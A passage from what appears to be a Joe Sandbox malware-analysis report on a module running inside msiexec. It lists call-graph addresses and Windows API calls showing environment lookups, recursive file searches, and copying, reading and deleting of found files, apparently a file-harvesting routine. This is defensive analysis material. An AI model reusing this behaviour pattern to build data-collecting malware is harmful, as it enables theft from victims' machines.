calls 6170 21bd780c 6166->6170 6168 21bd7665 _abort 38 API calls 6168->6169 6194 21bd782e 6169->6194 6170->6156 6171 21bd5af6 _abort 38 API calls 6170->6171 6171->6156 6202 21bd499b 6172->6202 6178 21bd7527 6175->6178 6177 21bd55ad 6177->6134 6177->6145 6179 21bd7533 ___DestructExceptionObject 6178->6179 6184 21bd5671 RtlEnterCriticalSection 6179->6184 6181 21bd7541 6185 21bd7575 6181->6185 6183 21bd7568 _abort 6183->6177 6184->6181 6188 21bd56b9 RtlLeaveCriticalSection 6185->6188 6187 21bd757f 6187->6183 6188->6187 6189->6154 6190->6161 6192 21bd5af6 _abort 38 API calls 6191->6192 6193 21bd766a 6192->6193 6193->6168 6195 21bd77fd 6194->6195 6196 21bd7834 6194->6196 6195->6156 6195->6166 6195->6170 6201 21bd56b9 RtlLeaveCriticalSection 6196->6201 6199 21bd2ada _ValidateLocalCookies 5 API calls 6198->6199 6200 21bdbdd4 6199->6200 6200->6200 6201->6195 6203 21bd49a7 _abort 6202->6203 6204 21bd49bf 6203->6204 6224 21bd4af5 GetModuleHandleW 6203->6224 6233 21bd5671 RtlEnterCriticalSection 6204->6233 6211 21bd4aae 6216 21bdbdc9 _abort 5 API calls 6211->6216 6212 21bd4a82 6244 21bd4ab4 6212->6244 6213 21bd49c7 6219 21bd4a3c 6213->6219 6222 21bd4a65 6213->6222 6234 21bd527a 6213->6234 6220 21bd4ab3 6216->6220 6218 21bd4669 _abort 5 API calls 6218->6222 6221 21bd4a54 6219->6221 6237 21bd4669 6219->6237 6221->6218 6241 21bd4aa5 6222->6241 6225 21bd49b3 6224->6225 6225->6204 6226 21bd4b39 GetModuleHandleExW 6225->6226 6227 21bd4b63 GetProcAddress 6226->6227 6231 21bd4b78 6226->6231 6227->6231 6228 21bd4b8c FreeLibrary 6229 21bd4b95 6228->6229 6230 21bd2ada _ValidateLocalCookies 5 API calls 6229->6230 6232 21bd4b9f 6230->6232 6231->6228 6231->6229 6232->6204 6233->6213 6252 21bd5132 6234->6252 6238 21bd4698 6237->6238 6239 21bd2ada _ValidateLocalCookies 5 API calls 6238->6239 6240 21bd46c1 6239->6240 6240->6221 6274 21bd56b9 RtlLeaveCriticalSection 6241->6274 6243 21bd4a7e 6243->6211 6243->6212 6275 21bd6025 6244->6275 6247 21bd4ae2 6250 21bd4b39 _abort 8 API calls 6247->6250 
6248 21bd4ac2 GetPEB 6248->6247 6249 21bd4ad2 GetCurrentProcess TerminateProcess 6248->6249 6249->6247 6251 21bd4aea ExitProcess 6250->6251 6255 21bd50e1 6252->6255 6254 21bd5156 6254->6219 6256 21bd50ed ___DestructExceptionObject 6255->6256 6263 21bd5671 RtlEnterCriticalSection 6256->6263 6258 21bd50fb 6264 21bd515a 6258->6264 6262 21bd5119 _abort 6262->6254 6263->6258 6265 21bd517a 6264->6265 6269 21bd5182 6264->6269 6266 21bd2ada _ValidateLocalCookies 5 API calls 6265->6266 6267 21bd5108 6266->6267 6270 21bd5126 6267->6270 6268 21bd571e _free 20 API calls 6268->6265 6269->6265 6269->6268 6273 21bd56b9 RtlLeaveCriticalSection 6270->6273 6272 21bd5130 6272->6262 6273->6272 6274->6243 6276 21bd604a 6275->6276 6277 21bd6040 6275->6277 6278 21bd5c45 _abort 5 API calls 6276->6278 6279 21bd2ada _ValidateLocalCookies 5 API calls 6277->6279 6278->6277 6280 21bd4abe 6279->6280 6280->6247 6280->6248 6281 21bd60ac 6282 21bd60dd 6281->6282 6283 21bd60b7 6281->6283 6283->6282 6284 21bd60c7 FreeLibrary 6283->6284 6284->6283 7344 21bd506f 7345 21bd5087 7344->7345 7346 21bd5081 7344->7346 7347 21bd5000 20 API calls 7346->7347 7347->7345 7224 21bd742b 7227 21bd7430 7224->7227 7225 21bd7453 7227->7225 7228 21bd8bae 7227->7228 7229 21bd8bbb 7228->7229 7230 21bd8bdd 7228->7230 7231 21bd8bc9 RtlDeleteCriticalSection 7229->7231 7232 21bd8bd7 7229->7232 7230->7227 7231->7231 7231->7232 7233 21bd571e _free 20 API calls 7232->7233 7233->7230 7348 21bdac6b 7349 21bdac84 __startOneArgErrorHandling 7348->7349 7350 21bdb2f0 21 API calls 7349->7350 7351 21bdacad __startOneArgErrorHandling 7349->7351 7350->7351 6285 21bdc7a7 6286 21bdc7be 6285->6286 6290 21bdc80d 6285->6290 6286->6290 6294 21bdc7e6 GetModuleHandleA 6286->6294 6288 21bdc835 GetModuleHandleA 6288->6290 6289 21bdc872 6290->6288 6290->6289 6291 21bdc85f GetProcAddress 6290->6291 6291->6290 6295 21bdc7ef 6294->6295 6296 21bdc80d 6294->6296 6303 21bdc803 GetProcAddress 6295->6303 6298 21bdc835 GetModuleHandleA 6296->6298 6299 
21bdc872 6296->6299 6302 21bdc85f GetProcAddress 6296->6302 6298->6296 6302->6296 6307 21bdc80d 6303->6307 6304 21bdc835 GetModuleHandleA 6304->6307 6305 21bdc872 6306 21bdc85f GetProcAddress 6306->6307 6307->6304 6307->6305 6307->6306 6308 21bd21a1 ___scrt_dllmain_exception_filter 7352 21bd9d61 7353 21bd9d81 7352->7353 7356 21bd9db8 7353->7356 7355 21bd9dab 7357 21bd9dbf 7356->7357 7358 21bd9e20 7357->7358 7362 21bd9ddf 7357->7362 7360 21bda90e 7358->7360 7365 21bdaa17 7358->7365 7360->7355 7362->7360 7363 21bdaa17 21 API calls 7362->7363 7364 21bda93e 7363->7364 7364->7355 7366 21bdaa20 7365->7366 7369 21bdb19b 7366->7369 7370 21bdb1da __startOneArgErrorHandling 7369->7370 7375 21bdb25c __startOneArgErrorHandling 7370->7375 7379 21bdb59e 7370->7379 7372 21bdb286 7373 21bdb8b2 __startOneArgErrorHandling 20 API calls 7372->7373 7374 21bdb292 7372->7374 7373->7374 7377 21bd2ada _ValidateLocalCookies 5 API calls 7374->7377 7375->7372 7376 21bd78a3 __startOneArgErrorHandling 5 API calls 7375->7376 7376->7372 7378 21bd9e6e 7377->7378 7378->7355 7380 21bdb5c1 __raise_exc RaiseException 7379->7380 7381 21bdb5bc 7380->7381 7381->7375 6309 21bd81a0 6310 21bd81d9 6309->6310 6311 21bd81dd 6310->6311 6320 21bd8205 6310->6320 6312 21bd6368 _free 20 API calls 6311->6312 6314 21bd81e2 6312->6314 6313 21bd8529 6315 21bd2ada _ValidateLocalCookies 5 API calls 6313->6315 6316 21bd62ac _abort 26 API calls 6314->6316 6317 21bd8536 6315->6317 6318 21bd81ed 6316->6318 6319 21bd2ada _ValidateLocalCookies 5 API calls 6318->6319 6321 21bd81f9 6319->6321 6320->6313 6323 21bd80c0 6320->6323 6326 21bd80db 6323->6326 6324 21bd2ada _ValidateLocalCookies 5 API calls 6325 21bd8152 6324->6325 6325->6320 6326->6324 6754 21bda1e0 6757 21bda1fe 6754->6757 6756 21bda1f6 6759 21bda203 6757->6759 6761 21bda298 6759->6761 6762 21bdaa53 6759->6762 6761->6756 6763 21bdaa70 RtlDecodePointer 6762->6763 6765 21bdaa80 6762->6765 6763->6765 6764 21bd2ada _ValidateLocalCookies 5 API calls 6767 21bda42f 
6764->6767 6766 21bdab0d 6765->6766 6768 21bdab02 6765->6768 6770 21bdaab7 6765->6770 6766->6768 6769 21bd6368 _free 20 API calls 6766->6769 6767->6756 6768->6764 6769->6768 6770->6768 6771 21bd6368 _free 20 API calls 6770->6771 6771->6768 7382 21bd7260 GetStartupInfoW 7383 21bd7318 7382->7383 7384 21bd7286 7382->7384 7384->7383 7385 21bd8be3 27 API calls 7384->7385 7386 21bd72af 7385->7386 7386->7383 7387 21bd72dd GetFileType 7386->7387 7387->7386 6772 21bd4bdd 6773 21bd4bec 6772->6773 6774 21bd4c08 6772->6774 6773->6774 6775 21bd4bf2 6773->6775 6776 21bd6d60 51 API calls 6774->6776 6777 21bd6368 _free 20 API calls 6775->6777 6778 21bd4c0f GetModuleFileNameA 6776->6778 6779 21bd4bf7 6777->6779 6780 21bd4c33 6778->6780 6781 21bd62ac _abort 26 API calls 6779->6781 6795 21bd4d01 6780->6795 6783 21bd4c01 6781->6783 6785 21bd4e76 20 API calls 6786 21bd4c5d 6785->6786 6787 21bd4c66 6786->6787 6788 21bd4c72 6786->6788 6789 21bd6368 _free 20 API calls 6787->6789 6790 21bd4d01 38 API calls 6788->6790 6794 21bd4c6b 6789->6794 6792 21bd4c88 6790->6792 6791 21bd571e _free 20 API calls 6791->6783 6793 21bd571e _free 20 API calls 6792->6793 6792->6794 6793->6794 6794->6791 6797 21bd4d26 6795->6797 6799 21bd4d86 6797->6799 6801 21bd70eb 6797->6801 6798 21bd4c50 6798->6785 6799->6798 6800 21bd70eb 38 API calls 6799->6800 6800->6799 6804 21bd7092 6801->6804 6805 21bd54a7 __fassign 38 API calls 6804->6805 6806 21bd70a6 6805->6806 6806->6797 7234 21bd281c 7237 21bd2882 7234->7237 7240 21bd3550 7237->7240 7239 21bd282a 7241 21bd355d 7240->7241 7244 21bd358a 7240->7244 7242 21bd47e5 ___std_exception_copy 21 API calls 7241->7242 7241->7244 7243 21bd357a 7242->7243 7243->7244 7245 21bd544d ___std_exception_copy 26 API calls 7243->7245 7244->7239 7245->7244 7246 21bd2418 7247 21bd2420 ___scrt_release_startup_lock 7246->7247 7250 21bd47f5 7247->7250 7249 21bd2448 7251 21bd4808 7250->7251 7252 21bd4804 7250->7252 7255 21bd4815 7251->7255 7252->7249 7256 21bd5b7a _abort 20 API calls 
7255->7256 7259 21bd482c 7256->7259 7257 21bd2ada _ValidateLocalCookies 5 API calls 7258 21bd4811 7257->7258 7258->7249 7259->7257 5797 21bd1c5b 5798 21bd1c6b ___scrt_fastfail 5797->5798 5801 21bd12ee 5798->5801 5800 21bd1c87 5802 21bd1324 ___scrt_fastfail 5801->5802 5803 21bd13b7 GetEnvironmentVariableW 5802->5803 5827 21bd10f1 5803->5827 5806 21bd10f1 57 API calls 5807 21bd1465 5806->5807 5808 21bd10f1 57 API calls 5807->5808 5809 21bd1479 5808->5809 5810 21bd10f1 57 API calls 5809->5810 5811 21bd148d 5810->5811 5812 21bd10f1 57 API calls 5811->5812 5813 21bd14a1 5812->5813 5814 21bd10f1 57 API calls 5813->5814 5815 21bd14b5 lstrlenW 5814->5815 5816 21bd14d9 lstrlenW 5815->5816 5826 21bd14d2 5815->5826 5817 21bd10f1 57 API calls 5816->5817 5818 21bd1501 lstrlenW lstrcatW 5817->5818 5819 21bd10f1 57 API calls 5818->5819 5820 21bd1539 lstrlenW lstrcatW 5819->5820 5821 21bd10f1 57 API calls 5820->5821 5822 21bd156b lstrlenW lstrcatW 5821->5822 5823 21bd10f1 57 API calls 5822->5823 5824 21bd159d lstrlenW lstrcatW 5823->5824 5825 21bd10f1 57 API calls 5824->5825 5825->5826 5826->5800 5828 21bd1118 ___scrt_fastfail 5827->5828 5829 21bd1129 lstrlenW 5828->5829 5840 21bd2c40 5829->5840 5832 21bd1168 lstrlenW 5833 21bd1177 lstrlenW FindFirstFileW 5832->5833 5834 21bd11e1 5833->5834 5835 21bd11a0 5833->5835 5834->5806 5836 21bd11c7 FindNextFileW 5835->5836 5839 21bd11aa 5835->5839 5836->5835 5837 21bd11da FindClose 5836->5837 5837->5834 5839->5836 5842 21bd1000 5839->5842 5841 21bd1148 lstrcatW lstrlenW 5840->5841 5841->5832 5841->5833 5843 21bd1022 ___scrt_fastfail 5842->5843 5844 21bd10af 5843->5844 5845 21bd102f lstrcatW lstrlenW 5843->5845 5846 21bd10b5 lstrlenW 5844->5846 5858 21bd10ad 5844->5858 5847 21bd106b lstrlenW 5845->5847 5848 21bd105a lstrlenW 5845->5848 5873 21bd1e16 5846->5873 5859 21bd1e89 lstrlenW 5847->5859 5848->5847 5851 21bd10ca 5854 21bd1e89 5 API calls 5851->5854 5851->5858 5852 21bd1088 GetFileAttributesW 5853 21bd109c 5852->5853 5852->5858 
5853->5858 5865 21bd173a 5853->5865 5855 21bd10df 5854->5855 5878 21bd11ea 5855->5878 5858->5839 5860 21bd2c40 ___scrt_fastfail 5859->5860 5861 21bd1ea7 lstrcatW lstrlenW 5860->5861 5862 21bd1ed1 lstrcatW 5861->5862 5863 21bd1ec2 5861->5863 5862->5852 5863->5862 5864 21bd1ec7 lstrlenW 5863->5864 5864->5862 5866 21bd1747 ___scrt_fastfail 5865->5866 5893 21bd1cca 5866->5893 5869 21bd199f 5869->5858 5871 21bd1824 ___scrt_fastfail _strlen 5871->5869 5913 21bd15da 5871->5913 5874 21bd1e29 5873->5874 5876 21bd1e4c 5873->5876 5875 21bd1e2d lstrlenW 5874->5875 5874->5876 5875->5876 5877 21bd1e3f lstrlenW 5875->5877 5876->5851 5877->5876 5879 21bd120e ___scrt_fastfail 5878->5879 5880 21bd1e89 5 API calls 5879->5880 5881 21bd1220 GetFileAttributesW 5880->5881 5882 21bd1235 5881->5882 5883 21bd1246 5881->5883 5882->5883 5885 21bd173a 35 API calls 5882->5885 5884 21bd1e89 5 API calls 5883->5884 5886 21bd1258 5884->5886 5885->5883 5887 21bd10f1 56 API calls 5886->5887 5888 21bd126d 5887->5888 5889 21bd1e89 5 API calls 5888->5889 5890 21bd127f ___scrt_fastfail 5889->5890 5891 21bd10f1 56 API calls 5890->5891 5892 21bd12e6 5891->5892 5892->5858 5894 21bd1cf1 ___scrt_fastfail 5893->5894 5895 21bd1d0f CopyFileW CreateFileW 5894->5895 5896 21bd1d55 GetFileSize 5895->5896 5897 21bd1d44 DeleteFileW 5895->5897 5898 21bd1ede 22 API calls 5896->5898 5902 21bd1808 5897->5902 5899 21bd1d66 ReadFile 5898->5899 5900 21bd1d7d CloseHandle DeleteFileW 5899->5900 5901 21bd1d94 CloseHandle DeleteFileW 5899->5901 5900->5902 5901->5902 5902->5869 5903 21bd1ede 5902->5903 5905 21bd222f 5903->5905 5906 21bd224e 5905->5906 5908 21bd2250 5905->5908 5921 21bd474f 5905->5921 5926 21bd47e5 5905->5926 5906->5871 5909 21bd2908 5908->5909 5933 21bd35d2 5908->5933 5910 21bd35d2 __CxxThrowException@8 RaiseException 5909->5910 5912 21bd2925 5910->5912 5912->5871 5914 21bd160c _strcat _strlen 5913->5914 5915 21bd163c lstrlenW 5914->5915 6021 21bd1c9d 5915->6021 5917 21bd1655 lstrcatW lstrlenW 5918 21bd1678 
5917->5918 5919 21bd167e lstrcatW 5918->5919 5920 21bd1693 ___scrt_fastfail 5918->5920 5919->5920 5920->5871 5936 21bd4793 5921->5936 5923 21bd4765 5942 21bd2ada 5923->5942 5925 21bd478f 5925->5905 5932 21bd56d0 _abort 5926->5932 5927 21bd570e 5955 21bd6368 5927->5955 5929 21bd56f9 RtlAllocateHeap 5930 21bd570c 5929->5930 5929->5932 5930->5905 5931 21bd474f _abort 7 API calls 5931->5932 5932->5927 5932->5929 5932->5931 5935 21bd35f2 RaiseException 5933->5935 5935->5909 5937 21bd479f ___DestructExceptionObject 5936->5937 5949 21bd5671 RtlEnterCriticalSection 5937->5949 5939 21bd47aa 5950 21bd47dc 5939->5950 5941 21bd47d1 _abort 5941->5923 5943 21bd2ae5 IsProcessorFeaturePresent 5942->5943 5944 21bd2ae3 5942->5944 5946 21bd2b58 5943->5946 5944->5925 5954 21bd2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5946->5954 5948 21bd2c3b 5948->5925 5949->5939 5953 21bd56b9 RtlLeaveCriticalSection 5950->5953 5952 21bd47e3 5952->5941 5953->5952 5954->5948 5958 21bd5b7a GetLastError 5955->5958 5959 21bd5b99 5958->5959 5960 21bd5b93 5958->5960 5964 21bd5bf0 SetLastError 5959->5964 5984 21bd637b 5959->5984 5977 21bd5e08 5960->5977 5965 21bd5bf9 5964->5965 5965->5930 5966 21bd5bb3 5991 21bd571e 5966->5991 5970 21bd5bb9 5972 21bd5be7 SetLastError 5970->5972 5971 21bd5bcf 6004 21bd593c 5971->6004 5972->5965 5975 21bd571e _free 17 API calls 5976 21bd5be0 5975->5976 5976->5964 5976->5972 6009 21bd5c45 5977->6009 5979 21bd5e2f 5980 21bd5e47 TlsGetValue 5979->5980 5981 21bd5e3b 5979->5981 5980->5981 5982 21bd2ada _ValidateLocalCookies 5 API calls 5981->5982 5983 21bd5e58 5982->5983 5983->5959 5985 21bd6388 _abort 5984->5985 5986 21bd63c8 5985->5986 5987 21bd63b3 RtlAllocateHeap 5985->5987 5990 21bd474f _abort 7 API calls 5985->5990 5988 21bd6368 _free 19 API calls 5986->5988 5987->5985 5989 21bd5bab 5987->5989 5988->5989 5989->5966 5997 21bd5e5e 5989->5997 5990->5985 5992 21bd5729 HeapFree 5991->5992 5993 21bd5752 _free 5991->5993 5992->5993 
5994 21bd573e 5992->5994 5993->5970 5995 21bd6368 _free 18 API calls 5994->5995 5996 21bd5744 GetLastError 5995->5996 5996->5993 5998 21bd5c45 _abort 5 API calls 5997->5998 5999 21bd5e85 5998->5999 6000 21bd5ea0 TlsSetValue 5999->6000 6001 21bd5e94 5999->6001 6000->6001 6002 21bd2ada _ValidateLocalCookies 5 API calls 6001->6002 6003 21bd5bc8 6002->6003 6003->5966 6003->5971 6015 21bd5914 6004->6015 6013 21bd5c71 6009->6013 6014 21bd5c75 __crt_fast_encode_pointer 6009->6014 6010 21bd5c95 6012 21bd5ca1 GetProcAddress 6010->6012 6010->6014 6011 21bd5ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6011->6013 6012->6014 6013->6010 6013->6011 6013->6014 6014->5979 6016 21bd5854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6015->6016 6017 21bd5938 6016->6017 6018 21bd58c4 6017->6018 6019 21bd5758 _abort 20 API calls 6018->6019 6020 21bd58e8 6019->6020 6020->5975 6022 21bd1ca6 _strlen 6021->6022 6022->5917 6807 21bd20db 6808 21bd20e7 ___DestructExceptionObject 6807->6808 6809 21bd2110 dllmain_raw 6808->6809 6814 21bd210b 6808->6814 6818 21bd20f6 6808->6818 6810 21bd212a 6809->6810 6809->6818 6820 21bd1eec 6810->6820 6812 21bd2177 6813 21bd1eec 31 API calls 6812->6813 6812->6818 6815 21bd218a 6813->6815 6814->6812 6817 21bd1eec 31 API calls 6814->6817 6814->6818 6816 21bd2193 dllmain_raw 6815->6816 6815->6818 6816->6818 6819 21bd216d dllmain_raw 6817->6819 6819->6812 6821 21bd1f2a dllmain_crt_process_detach 6820->6821 6822 21bd1ef7 6820->6822 6826 21bd1f06 6821->6826 6823 21bd1f1c dllmain_crt_process_attach 6822->6823 6824 21bd1efc 6822->6824 6823->6826 6825 21bd1f12 6824->6825 6827 21bd1f01 6824->6827 6835 21bd23ec 6825->6835 6826->6814 6827->6826 6830 21bd240b 6827->6830 6843 21bd53e5 6830->6843 6954 21bd3513 6835->6954 6840 21bd2408 6840->6826 6841 21bd351e 7 API calls 6842 21bd23f5 6841->6842 6842->6826 6849 21bd5aca 6843->6849 6846 21bd351e 6925 21bd3820 6846->6925 6848 21bd2415 6848->6826 6850 21bd5ad4 6849->6850 6853 21bd2410 6849->6853 
6851 21bd5e08 _abort 11 API calls 6850->6851 6852 21bd5adb 6851->6852 6852->6853 6854 21bd5e5e _abort 11 API calls 6852->6854 6853->6846 6855 21bd5aee 6854->6855 6857 21bd59b5 6855->6857 6858 21bd59c0 6857->6858 6859 21bd59d0 6857->6859 6863 21bd59d6 6858->6863 6859->6853 6862 21bd571e _free 20 API calls 6862->6859 6864 21bd59e9 6863->6864 6865 21bd59ef 6863->6865 6866 21bd571e _free 20 API calls 6864->6866 6867 21bd571e _free 20 API calls 6865->6867 6866->6865 6868 21bd59fb 6867->6868 6869 21bd571e _free 20 API calls 6868->6869 6870 21bd5a06 6869->6870 6871 21bd571e _free 20 API calls 6870->6871 6872 21bd5a11 6871->6872 6873 21bd571e _free 20 API calls 6872->6873 6874 21bd5a1c 6873->6874 6875 21bd571e _free 20 API calls 6874->6875 6876 21bd5a27 6875->6876 6877 21bd571e _free 20 API calls 6876->6877 6878 21bd5a32 6877->6878 6879 21bd571e _free 20 API calls 6878->6879 6880 21bd5a3d 6879->6880 6881 21bd571e _free 20 API calls 6880->6881 6882 21bd5a48 6881->6882 6883 21bd571e _free 20 API calls 6882->6883 6884 21bd5a56 6883->6884 6889 21bd589c 6884->6889 6895 21bd57a8 6889->6895 6891 21bd58c0 6892 21bd58ec 6891->6892 6908 21bd5809 6892->6908 6894 21bd5910 6894->6862 6896 21bd57b4 ___DestructExceptionObject 6895->6896 6903 21bd5671 RtlEnterCriticalSection 6896->6903 6898 21bd57be 6901 21bd571e _free 20 API calls 6898->6901 6902 21bd57e8 6898->6902 6900 21bd57f5 _abort 6900->6891 6901->6902 6904 21bd57fd 6902->6904 6903->6898 6907 21bd56b9 RtlLeaveCriticalSection 6904->6907 6906 21bd5807 6906->6900 6907->6906 6909 21bd5815 ___DestructExceptionObject 6908->6909 6916 21bd5671 RtlEnterCriticalSection 6909->6916 6911 21bd581f 6917 21bd5a7f 6911->6917 6913 21bd5832 6921 21bd5848 6913->6921 6915 21bd5840 _abort 6915->6894 6916->6911 6918 21bd5ab5 __fassign 6917->6918 6919 21bd5a8e __fassign 6917->6919 6918->6913 6919->6918 6920 21bd7cc2 __fassign 20 API calls 6919->6920 6920->6918 6924 21bd56b9 RtlLeaveCriticalSection 6921->6924 6923 21bd5852 6923->6915 6924->6923 6926 
21bd382d 6925->6926 6930 21bd384b ___vcrt_freefls@4 6925->6930 6927 21bd383b 6926->6927 6931 21bd3b67 6926->6931 6936 21bd3ba2 6927->6936 6930->6848 6941 21bd3a82 6931->6941 6933 21bd3b81 6934 21bd3b8d 6933->6934 6935 21bd3b99 TlsGetValue 6933->6935 6934->6927 6935->6934 6937 21bd3a82 try_get_function 5 API calls 6936->6937 6938 21bd3bbc 6937->6938 6939 21bd3bd7 TlsSetValue 6938->6939 6940 21bd3bcb 6938->6940 6939->6940 6940->6930 6942 21bd3aaa 6941->6942 6943 21bd3aa6 __crt_fast_encode_pointer 6941->6943 6942->6943 6947 21bd39be 6942->6947 6943->6933 6946 21bd3ac4 GetProcAddress 6946->6943 6948 21bd39cd try_get_first_available_module 6947->6948 6949 21bd3a77 6948->6949 6950 21bd39ea LoadLibraryExW 6948->6950 6952 21bd3a60 FreeLibrary 6948->6952 6953 21bd3a38 LoadLibraryExW 6948->6953 6949->6943 6949->6946 6950->6948 6951 21bd3a05 GetLastError 6950->6951 6951->6948 6952->6948 6953->6948 6960 21bd3856 6954->6960 6956 21bd23f1 6956->6842 6957 21bd53da 6956->6957 6958 21bd5b7a _abort 20 API calls 6957->6958 6959 21bd23fd 6958->6959 6959->6840 6959->6841 6961 21bd385f 6960->6961 6962 21bd3862 GetLastError 6960->6962 6961->6956 6963 21bd3b67 ___vcrt_FlsGetValue 6 API calls 6962->6963 6964 21bd3877 6963->6964 6965 21bd38dc SetLastError 6964->6965 6966 21bd3ba2 ___vcrt_FlsSetValue 6 API calls 6964->6966 6971 21bd3896 6964->6971 6965->6956 6967 21bd3890 6966->6967 6969 21bd3ba2 ___vcrt_FlsSetValue 6 API calls 6967->6969 6970 21bd38b8 6967->6970 6967->6971 6968 21bd3ba2 ___vcrt_FlsSetValue 6 API calls 6968->6971 6969->6970 6970->6968 6970->6971 6971->6965 6327 21bd4a9a 6328 21bd5411 38 API calls 6327->6328 6329 21bd4aa2 6328->6329 6972 21bd73d5 6973 21bd73e1 ___DestructExceptionObject 6972->6973 6984 21bd5671 RtlEnterCriticalSection 6973->6984 6975 21bd73e8 6985 21bd8be3 6975->6985 6977 21bd73f7 6978 21bd7406 6977->6978 6998 21bd7269 GetStartupInfoW 6977->6998 7009 21bd7422 6978->7009 6982 21bd7417 _abort 6984->6975 6986 21bd8bef ___DestructExceptionObject 6985->6986 6987 
21bd8bfc 6986->6987 6988 21bd8c13 6986->6988 6990 21bd6368 _free 20 API calls 6987->6990 7012 21bd5671 RtlEnterCriticalSection 6988->7012 6991 21bd8c01 6990->6991 6992 21bd62ac _abort 26 API calls 6991->6992 6993 21bd8c0b _abort 6992->6993 6993->6977 6994 21bd8c4b 7020 21bd8c72 6994->7020 6995 21bd8c1f 6995->6994 7013 21bd8b34 6995->7013 6999 21bd7318 6998->6999 7000 21bd7286 6998->7000 7004 21bd731f 6999->7004 7000->6999 7001 21bd8be3 27 API calls 7000->7001 7002 21bd72af 7001->7002 7002->6999 7003 21bd72dd GetFileType 7002->7003 7003->7002 7005 21bd7326 7004->7005 7006 21bd7369 GetStdHandle 7005->7006 7007 21bd73d1 7005->7007 7008 21bd737c GetFileType 7005->7008 7006->7005 7007->6978 7008->7005 7024 21bd56b9 RtlLeaveCriticalSection 7009->7024 7011 21bd7429 7011->6982 7012->6995 7014 21bd637b _abort 20 API calls 7013->7014 7017 21bd8b46 7014->7017 7015 21bd8b53 7016 21bd571e _free 20 API calls 7015->7016 7018 21bd8ba5 7016->7018 7017->7015 7019 21bd5eb7 11 API calls 7017->7019 7018->6995 7019->7017 7023 21bd56b9 RtlLeaveCriticalSection 7020->7023 7022 21bd8c79 7022->6993 7023->7022 7024->7011 7025 21bd4ed7 7026 21bd6d60 51 API calls 7025->7026 7027 21bd4ee9 7026->7027 7036 21bd7153 GetEnvironmentStringsW 7027->7036 7031 21bd4eff 7034 21bd571e _free 20 API calls 7031->7034 7032 21bd571e _free 20 API calls 7033 21bd4f29 7032->7033 7035 21bd4ef4 7034->7035 7035->7032 7037 21bd716a 7036->7037 7038 21bd71bd 7036->7038 7041 21bd7170 WideCharToMultiByte 7037->7041 7039 21bd4eee 7038->7039 7040 21bd71c6 FreeEnvironmentStringsW 7038->7040 7039->7035 7048 21bd4f2f 7039->7048 7040->7039 7041->7038 7042 21bd718c 7041->7042 7043 21bd56d0 21 API calls 7042->7043 7044 21bd7192 7043->7044 7045 21bd7199 WideCharToMultiByte 7044->7045 7046 21bd71af 7044->7046 7045->7046 7047 21bd571e _free 20 API calls 7046->7047 7047->7038 7049 21bd4f44 7048->7049 7050 21bd637b _abort 20 API calls 7049->7050 7060 21bd4f6b 7050->7060 7051 21bd4fcf 7052 21bd571e _free 20 API calls 7051->7052 7053 
21bd4fe9 7052->7053 7053->7031 7054 21bd637b _abort 20 API calls 7054->7060 7055 21bd4fd1 7056 21bd5000 20 API calls 7055->7056 7058 21bd4fd7 7056->7058 7061 21bd571e _free 20 API calls 7058->7061 7059 21bd4ff3 7062 21bd62bc _abort 11 API calls 7059->7062 7060->7051 7060->7054 7060->7055 7060->7059 7063 21bd571e _free 20 API calls 7060->7063 7065 21bd544d 7060->7065 7061->7051 7064 21bd4fff 7062->7064 7063->7060 7066 21bd5468 7065->7066 7067 21bd545a 7065->7067 7068 21bd6368 _free 20 API calls 7066->7068 7067->7066 7070 21bd547f 7067->7070 7073 21bd5470 7068->7073 7069 21bd62ac _abort 26 API calls 7071 21bd547a 7069->7071 7070->7071 7072 21bd6368 _free 20 API calls 7070->7072 7071->7060 7072->7073 7073->7069 7388 21bd5351 7389 21bd5360 7388->7389 7393 21bd5374 7388->7393 7391 21bd571e _free 20 API calls 7389->7391 7389->7393 7390 21bd571e _free 20 API calls 7392 21bd5386 7390->7392 7391->7393 7394 21bd571e _free 20 API calls 7392->7394 7393->7390 7395 21bd5399 7394->7395 7396 21bd571e _free 20 API calls 7395->7396 7397 21bd53aa 7396->7397 7398 21bd571e _free 20 API calls 7397->7398 7399 21bd53bb 7398->7399 6330 21bd3c90 RtlUnwind 7074 21bd36d0 7075 21bd36e2 7074->7075 7077 21bd36f0 @_EH4_CallFilterFunc@8 7074->7077 7076 21bd2ada _ValidateLocalCookies 5 API calls 7075->7076 7076->7077 7260 21bd220c 7261 21bd221a dllmain_dispatch 7260->7261 7262 21bd2215 7260->7262 7264 21bd22b1 7262->7264 7265 21bd22c7 7264->7265 7267 21bd22d0 7265->7267 7268 21bd2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7265->7268 7267->7261 7268->7267 7400 21bd284f 7401 21bd2882 std::exception::exception 27 API calls 7400->7401 7402 21bd285d 7401->7402 7403 21bd724e GetProcessHeap 6331 21bd8a89 6334 21bd6d60 6331->6334 6335 21bd6d69 6334->6335 6336 21bd6d72 6334->6336 6338 21bd6c5f 6335->6338 6339 21bd5af6 _abort 38 API calls 6338->6339 6340 21bd6c6c 6339->6340 6358 21bd6d7e 6340->6358 6342 21bd6c74 6367 21bd69f3 6342->6367 6345 21bd6c8b 6345->6336 

Control-flow Graph

APIs
• lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21BD1137
• lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21BD1151
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21BD115C
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21BD116D
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21BD117C
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21BD1193
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 21BD11D0
• FindClose.KERNEL32(00000000), ref: 21BD11DB
Memory Dump Source
• Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
• Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
Similarity
• API ID: lstrlen$Find$File$CloseFirstNextlstrcat
• String ID:
• API String ID: 1083526818-0
